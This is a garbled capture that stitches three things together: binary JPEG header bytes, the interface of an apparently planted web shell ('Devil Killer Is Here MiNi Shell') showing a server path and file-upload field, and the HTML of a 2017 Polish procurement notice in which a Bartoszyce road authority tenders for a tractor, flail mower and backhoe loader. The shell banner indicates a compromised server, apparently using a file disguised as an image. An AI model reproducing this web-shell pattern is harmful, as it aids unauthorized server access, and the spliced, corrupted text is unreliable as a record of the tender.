JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170320/46792-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bipspbartoszyce.warmia.mazury.pl/' target='_blank'>http://bipspbartoszyce.warmia.mazury.pl/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 46792 - 2017
              z dnia 2017-03-20 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bartoszyce: Dostawa ciągnika rolniczego z kosiarką bijakową-wysięgnikową oraz koparko-ładowarki<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych w Dąbrowie k. Bartoszyc, krajowy numer identyfikacyjny
              510750580, ul.
              ul. Dąbrowa 
              ,
              11200  
              Bartoszyce, woj.
              warmińsko-mazurskie, państwo
              Polska, tel.
              897 642 002, e-mail
              zdpdabrowa@wp.pl, faks
              897 642 002.
              <br />
              Adres strony internetowej (URL): zdpdabrowa@wp.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Jednostki organizacyjne administracji samorządowej
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bipspbartoszyce.warmia.mazury.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Składanie oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Zarząd Dróg Powiatowych w Dąbrowie k/Bartoszyc, Dąbrowa 56A, 11-200 Bartoszyce</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa ciągnika rolniczego z kosiarką bijakową-wysięgnikową oraz koparko-ładowarki<br /><b>Numer referencyjny: </b>ZDP-DT.343.1.3.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa fabrycznie nowego ciągnika rolniczego z fabrycznie nową kosiarką bijakową - wysięgnikową oraz fabrycznie nowej koparko  ładowarki z podziałem na części:
Część 1  Dostawa fabrycznie nowego ciągnika rolniczego - szt. 1 oraz fabrycznie nowej kosiarki bijakowej  wysięgnikowej  szt. 1 na plac Zarządu Dróg Powiatowych w Dąbrowie, Dąbrowa 56A, 11-200 Bartoszyce
Część 2  Dostawa fabrycznie nowej koparkoładowarki - szt. 1 na plac Zarządu Dróg Powiatowych w Dąbrowie, Dąbrowa 56A, 11-200 Bartoszyce
Szczegółowy opis przedmiotu zamówienia określono w specyfikacji istotnych warunków zamówienia oraz załącznikach do specyfikacji.
Sprzęt będący przedmiotem zamówienia (ciągnik rolniczy, kosiarka bijakowa  wysięgnikowa, koparko ładowarka musi być fabrycznie nowy, kompletny, sprawny technicznie, musi spełniać europejskie normy bezpieczeństwa oraz posiadać niezbędne atetesty/certyfikaty, musi być  gotowy do eksploatacji, nie może być przedmiotem zastawu, musi być bez obciążeń, wolny od wad prawnych i fizycznych (konstrukcyjnych, materiałowych, wykonawczych). 
Pod pojęciem fabrycznie nowy zamawiający rozumie sprzęt (ciągnik, kosiarka, koparko-ładowarka) wytworzony (wyprodukowany) przez fabrykę (zakład przemysłowy), który przed nabyciem nie był w jakiejkolwiek formie używany. Nie ma znaczenia w jaki sposób sprzęt ten został nabyty. Za fabrycznie nowy należy uznać sprzęt nabyty od dowolnego zbywcy w przypadku, gdy uprzednio nie był on używany (eksploatowany)
<br /><br /><b>II.5) Główny kod CPV: </b><br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 45<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz Ofertowy, Tabela zgodności parametrów technicznych, inne oświadczenia i dokumenty wskazane przez Zamawiającego w SIWZ</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 28/03/2017, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa fabrycznie nowego ciągnika rolniczego - szt. 1 oraz fabrycznie nowej kosiarki bijakowej  wysięgnikowej  szt. 1 na plac Zarządu Dróg Powiatowych w Dąbrowie, Dąbrowa 56A, 11-200 Bartoszyce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa fabrycznie nowego ciągnika rolniczego - szt. 1 oraz fabrycznie nowej kosiarki bijakowej  wysięgnikowej  szt. 1 na plac Zarządu Dróg Powiatowych w Dąbrowie, Dąbrowa 56A, 11-200 Bartoszyce
Parametry techniczne ciągnika:
1)	Fabrycznie nowy 
2)	Rok produkcji: 2017
3)	Kolor: pomarańczowy
4)	Rodzaj paliwa: olej napędowy
5)	Norma emisji spalin: min. TIER 4A
6)	Możliwość jazdy w ruchu drogowym z prędkością co najmniej 35 km/h
7)	Moc znamionowa silnika: min. 110 KM
8)	Silnik z zapłonem samoczynnym, co najmniej 4-cylindrowy turbo z intercoolerem
9)	Pojemność zbiornika paliwa: min. 120 l
10)	Waga ciągnika max. 4 500 kg
11)	Skrzynia biegów zsynchronizowana z rewersem hydraulicznym,  
12)	Liczba biegów: min. 12 do przodu i min. 12 do tyłu 
13)	Napęd na cztery koła (4WD) 
